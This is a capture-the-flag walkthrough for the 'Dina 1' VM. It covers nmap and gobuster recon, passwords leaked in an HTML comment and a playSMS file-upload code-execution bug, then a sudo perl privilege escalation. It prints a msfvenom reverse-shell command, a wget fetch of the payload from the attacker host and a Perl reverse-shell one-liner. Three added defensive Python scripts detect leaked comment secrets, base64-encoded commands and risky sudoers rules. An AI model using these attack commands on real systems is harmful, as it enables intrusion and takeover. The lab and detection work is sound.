Dina: CTF walkthrough

Information

Name: Dina 1

Date of release: 10 Jul 2017

Author: Touhid Shaikh

Series: Dina

Contact: touhidshaikh22 [at] gmaill [dot] com

Website: http://www.touhidshaikh.com

VM Link: https://drive.google.com/open?id=0B1qWCgvhnTXgNUF6Rlp0c3Rlb0k

Note that the link to download the virtual machine on VulnHub is not up to date. If you want to finish this CTF you have to download it from this link. Thanks to Touhid, who provided me with the good link after a short exchange of emails.


Reconnaissance

We can get the IP address of the VM with arp-scan:

[Screenshot: arp-scan output]

Let’s scan this system with nmap:

[email protected]:~# nmap -A -O -T5 -p- --reason 192.168.1.51

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-21 06:38 CEST
Warning: 192.168.1.51 giving up on port because retransmission cap hit (2).
Nmap scan report for dina.home (192.168.1.51)
Host is up, received arp-response (0.010s latency).
Not shown: 65522 closed ports
Reason: 65522 resets
PORT      STATE    SERVICE       REASON         VERSION
80/tcp    open     http          syn-ack ttl 64 Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 5 disallowed entries 
|_/ange1 /angel1 /nothing /tmp /uploads
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Dina
3337/tcp  filtered directv-catlg no-response
10107/tcp filtered bctp-server   no-response
15290/tcp filtered unknown       no-response
23358/tcp filtered unknown       no-response
31816/tcp filtered unknown       no-response
33087/tcp filtered unknown       no-response
49219/tcp filtered unknown       no-response
50535/tcp filtered unknown       no-response
52909/tcp filtered unknown       no-response
55107/tcp filtered unknown       no-response
57197/tcp filtered unknown       no-response
62644/tcp filtered unknown       no-response
MAC Address: 24:0A:64:9E:6E:74 (AzureWave Technology)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Network Distance: 1 hop

TRACEROUTE
HOP RTT      ADDRESS
1   10.14 ms dina.home (192.168.1.51)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 208.73 seconds
[email protected]:~#

Port 80 seems to be the only interesting service open.


Website Analysis

The robots.txt file lists a directory called nothing, and the index page of that directory contains a list of passwords inside an HTML comment. We will use them later.

[email protected]:~# curl http://192.168.1.51/nothing/
<html>
<head><title>404 NOT FOUND</title></head>
<body>
<!--
#my secret pass
freedom
password
helloworld!
diana
iloveroot
-->
<h1>NOT FOUND</html>
<h3>go back</h3>
</body>
</html>
[email protected]:~#
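Secrets left in HTML comments, like the password list above, are easy to catch before an attacker does. The following Python script is an added example, not part of the original walkthrough: it pulls every comment out of a page with the standard-library HTMLParser, flags those that mention password-like words, and lists the values that should be removed or rotated. The sample HTML is a constructed copy of the /nothing/ response shown above; the SECRET_HINTS word list is an assumption.

```python
# Added example (not from the original walkthrough): find secrets leaked in HTML comments.
from html.parser import HTMLParser

# Constructed sample: a copy of the /nothing/ response shown in the walkthrough.
SAMPLE_HTML = """<html>
<head><title>404 NOT FOUND</title></head>
<body>
<!--
#my secret pass
freedom
password
helloworld!
diana
iloveroot
-->
<h1>NOT FOUND</html>
<h3>go back</h3>
</body>
</html>
"""

# Words that suggest a comment carries credentials rather than markup notes (assumed list).
SECRET_HINTS = ("pass", "password", "secret", "cred", "key", "token")


class CommentCollector(HTMLParser):
    """Collect every HTML comment in the document, even inside malformed markup."""

    def __init__(self):
        super().__init__()
        self.comments = []

    def handle_comment(self, data):
        self.comments.append(data)


def extract_comments(html):
    """Return the raw text of every <!-- ... --> comment in the page."""
    parser = CommentCollector()
    parser.feed(html)
    parser.close()
    return parser.comments


def suspicious_comments(html):
    """Return (comment_text, non_empty_lines) for comments that look like leaked secrets."""
    findings = []
    for comment in extract_comments(html):
        lowered = comment.lower()
        if any(hint in lowered for hint in SECRET_HINTS):
            lines = [ln.strip() for ln in comment.splitlines() if ln.strip()]
            findings.append((comment, lines))
    return findings


def leaked_values(html):
    """Flatten findings into the candidate values a defender should remove or rotate."""
    values = []
    for _comment, lines in suspicious_comments(html):
        # Lines starting with '#' are labels ("#my secret pass"), not values.
        values.extend(ln for ln in lines if not ln.startswith("#"))
    return values


if __name__ == "__main__":
    for value in leaked_values(SAMPLE_HTML):
        print("leaked value:", value)
```

Run it against a mirrored copy of a web root (for example the output of wget -r) to audit every page, not just the ones robots.txt points at; robots.txt is advisory and hides nothing from a crawler that ignores it.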

With gobuster we find another interesting directory: secure.

[email protected]:~/Desktop# gobuster -u http://192.168.1.51/ -w /usr/share/seclists/Discovery/Web_Content/common.txt \
> -s 200,204,301,302,307,403,500 -e -m dir

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.1.51/
[+] Threads      : 10
[+] Wordlist     : /usr/share/seclists/Discovery/Web_Content/common.txt
[+] Status codes : 301,302,307,403,500,200,204
[+] Expanded     : true
=====================================================
http://192.168.1.51/.hta (Status: 403)
http://192.168.1.51/.htaccess (Status: 403)
http://192.168.1.51/.htpasswd (Status: 403)
http://192.168.1.51/cgi-bin/ (Status: 403)
http://192.168.1.51/index (Status: 200)
http://192.168.1.51/index.html (Status: 200)
http://192.168.1.51/robots (Status: 200)
http://192.168.1.51/robots.txt (Status: 200)
http://192.168.1.51/secure (Status: 301)
http://192.168.1.51/server-status (Status: 403)
http://192.168.1.51/tmp (Status: 301)
http://192.168.1.51/uploads (Status: 301)
=====================================================
[email protected]:~/Desktop#

In this directory we can download a password-protected ZIP file. Fortunately for us, one of the previously found passwords unlocks it.

Password: freedom

The extracted file is not a real MP3, just a text file with a hint for the next step.

[email protected]:~/Desktop# cat backup-cred.mp3 

I am not toooo smart in computer .......dat the resoan i always choose easy password...with creds backup file....

uname: touhid
password: ******


url : /SecreTSMSgatwayLogin
[email protected]:~/Desktop#

We can gain access to the admin panel of the playSMS web application with the following credentials:

Username: touhid
Password: diana


‘sendfromfile.php’ Vulnerability

According to this exploit (written by the VM author), we can execute PHP code by changing the name of the uploaded file with Burp Suite.

We generate a Linux reverse shell with msfvenom.

[email protected]:~# msfvenom -p linux/x86/meterpreter/reverse_tcp LPORT=1337 LHOST=192.168.1.102 -f elf -o rshell
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
Saved as: rshell
[email protected]:~#

Note that we base64-encode the commands in order to avoid bad characters. Here are the commands that will be used.

[email protected]:~# echo 'wget http://192.168.1.102/rshell -O /tmp/rshell' |base64
d2dldCBodHRwOi8vMTkyLjE2OC4xLjEwMi9yc2hlbGwgLU8gL3RtcC9yc2hlbGwK
[email protected]:~# 
[email protected]:~# 
[email protected]:~# echo 'chmod 777 /tmp/rshell; ls -la /tmp/rshell' |base64
Y2htb2QgNzc3IC90bXAvcnNoZWxsOyBscyAtbGEgL3RtcC9yc2hlbGwK
[email protected]:~# 
[email protected]:~# echo '/tmp/rshell' |base64 
L3RtcC9yc2hlbGwK
[email protected]:~#
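Base64-encoding a command to dodge a bad-character filter also leaves a recognisable trace in server logs. The Python script below is an added example, not from the original walkthrough: it scans constructed Apache-style access log lines (the encoded values are the three strings produced by the echo | base64 commands above; the /run?c= endpoint and the RFC 4648 cookie value are assumptions) and reports any base64 blob that decodes to printable text containing shell indicators such as wget, chmod or /tmp/.

```python
# Added example (not from the original walkthrough): detect base64-encoded shell commands
# passed through web request fields, the trick used above to avoid bad characters.
import base64
import binascii
import re
from urllib.parse import unquote

# Constructed Apache-style access log lines (not captured from the VM). The three encoded
# values are exactly the strings the echo | base64 commands above produce; the cookie on the
# second line is the RFC 4648 test vector and must not be reported.
SAMPLE_LOG = """\
192.168.1.102 - - [21/Oct/2017:06:50:01 +0200] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.1.102 - - [21/Oct/2017:06:51:13 +0200] "GET /robots.txt HTTP/1.1" 200 77 "-" "Mozilla/5.0" "session=QWxhZGRpbjpvcGVuIHNlc2FtZQ=="
192.168.1.102 - - [21/Oct/2017:06:52:40 +0200] "GET /run?c=d2dldCBodHRwOi8vMTkyLjE2OC4xLjEwMi9yc2hlbGwgLU8gL3RtcC9yc2hlbGwK HTTP/1.1" 200 12 "-" "Mozilla/5.0"
192.168.1.102 - - [21/Oct/2017:06:52:55 +0200] "GET /run?c=Y2htb2QgNzc3IC90bXAvcnNoZWxsOyBscyAtbGEgL3RtcC9yc2hlbGwK HTTP/1.1" 200 12 "-" "Mozilla/5.0"
192.168.1.102 - - [21/Oct/2017:06:53:02 +0200] "GET /run HTTP/1.1" 200 12 "-" "L3RtcC9yc2hlbGwK"
"""

# A run of base64 alphabet characters long enough to be worth decoding (16+ chars = 12+ bytes).
BASE64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# Words and paths that make decoded text look like a command rather than an opaque identifier.
SHELL_INDICATORS = re.compile(
    r"\b(?:wget|curl|chmod|bash|sh|nc|perl|python3?)\b|/tmp/|/dev/tcp"
)


def decode_if_text(token):
    """Return the decoded string if token is valid base64 for printable text, else None."""
    # Tolerate stripped padding: many filters and loggers drop trailing '=' characters.
    padded = token + "=" * (-len(token) % 4)
    try:
        raw = base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None  # binary data (session tokens, images), not a command
    if not text or not all(ch.isprintable() or ch in "\n\t\r" for ch in text):
        return None
    return text


def find_encoded_commands(log_text):
    """Return (line_number, token, decoded_command) for blobs that decode to shell-like text."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        # URL-decode first so %2B and %2F inside a token become '+' and '/'.
        for token in BASE64_TOKEN.findall(unquote(line)):
            decoded = decode_if_text(token)
            if decoded is None or not SHELL_INDICATORS.search(decoded):
                continue
            hits.append((number, token, decoded.strip()))
    return hits


if __name__ == "__main__":
    for number, token, command in find_encoded_commands(SAMPLE_LOG):
        print(f"line {number}: {token[:20]}... decodes to: {command}")
```

The indicator list is deliberately short; in production you would also decode values in request bodies and uploaded file names, since the walkthrough's payload travels in a filename rather than a query string.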

We upload our reverse shell to Dina.

[Screenshot: upload of the reverse shell]

Finally, we execute our reverse shell in order to gain a low privilege shell.

[Screenshot: reverse shell]

[Screenshot: low-privilege shell]


Privilege Escalation

Let’s see what we can do with our user.

[Screenshot: sudo misconfiguration]

Nice, we are allowed to run perl through sudo, so we can execute arbitrary Perl code with root privileges.

A Perl reverse shell one-liner run through sudo therefore gives us a root reverse shell.

[email protected]:/var$ sudo perl -e 'use Socket;$i="192.168.1.102";$p=666;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

[Screenshot: root shell]
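A sudo rule that hands a user an interpreter such as perl is equivalent to granting root, which is the misconfiguration the walkthrough exploits. The Python script below is an added example, not from the original walkthrough: it parses a sudoers file, flags rules that grant ALL or a binary with a known shell escape (the GTFOBins catalogue lists many more), rates NOPASSWD grants as critical, and checks a hardened rule that passes. The sudoers text is constructed (the VM's real file is only shown in a screenshot above), and the /usr/local/bin/sms-report.pl path in the hardened rule is a hypothetical script.

```python
# Added example (not from the original walkthrough): audit sudoers for rules that
# effectively grant a root shell, such as "NOPASSWD: /usr/bin/perl".
import re
from os.path import basename

# Constructed sudoers content (not the VM's real file). The touhid line mirrors what the
# walkthrough's "sudo perl" step implies.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
touhid  ALL=(ALL) NOPASSWD: /usr/bin/perl
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
deploy  ALL=(root) /usr/local/bin/restart-app.sh
"""

# Hardened replacement: a fixed, root-owned script instead of the interpreter itself
# (hypothetical path).
HARDENED_RULE = "touhid  ALL=(ALL) NOPASSWD: /usr/local/bin/sms-report.pl\n"

# Binaries that can run arbitrary code or spawn a shell when allowed via sudo.
# Illustrative subset; GTFOBins documents the escapes for each of these.
SHELL_ESCAPE_BINARIES = {
    "perl", "python", "python3", "ruby", "bash", "sh", "env",
    "vi", "vim", "less", "more", "find", "awk", "rsync", "tar",
}

ENTRY = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*"
    r"(?:(?P<tag>NOPASSWD|PASSWD):\s*)?(?P<cmds>.+)$"
)


def parse_sudoers(text):
    """Return one dict per user/group rule; Defaults, comments and blank lines are skipped."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        match = ENTRY.match(line)
        if match:
            rule = match.groupdict()
            rule["cmds"] = [c.strip() for c in rule["cmds"].split(",")]
            rules.append(rule)
    return rules


def audit_sudoers(text):
    """Flag rules that let a principal reach root: ALL, or a binary with a known shell escape."""
    findings = []
    for rule in parse_sudoers(text):
        nopasswd = rule["tag"] == "NOPASSWD"
        for cmd in rule["cmds"]:
            binary = basename(cmd.split()[0])
            if cmd == "ALL":
                if rule["who"] != "root":
                    findings.append((rule["who"], cmd, "high",
                                     "unrestricted sudo; review who holds this"))
            elif binary in SHELL_ESCAPE_BINARIES:
                severity = "critical" if nopasswd else "high"
                findings.append((rule["who"], cmd, severity,
                                 f"{binary} can spawn a root shell"))
    return findings


if __name__ == "__main__":
    for who, cmd, severity, reason in audit_sudoers(SAMPLE_SUDOERS):
        print(f"[{severity}] {who}: {cmd} ({reason})")
    print("hardened rule findings:", audit_sudoers(HARDENED_RULE))
```

The hardened rule only helps if the script is owned by root and not writable by the user; otherwise the user edits it and is back to a root shell. Rules with a password prompt are still flagged because the user's own password is enough to reach root.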


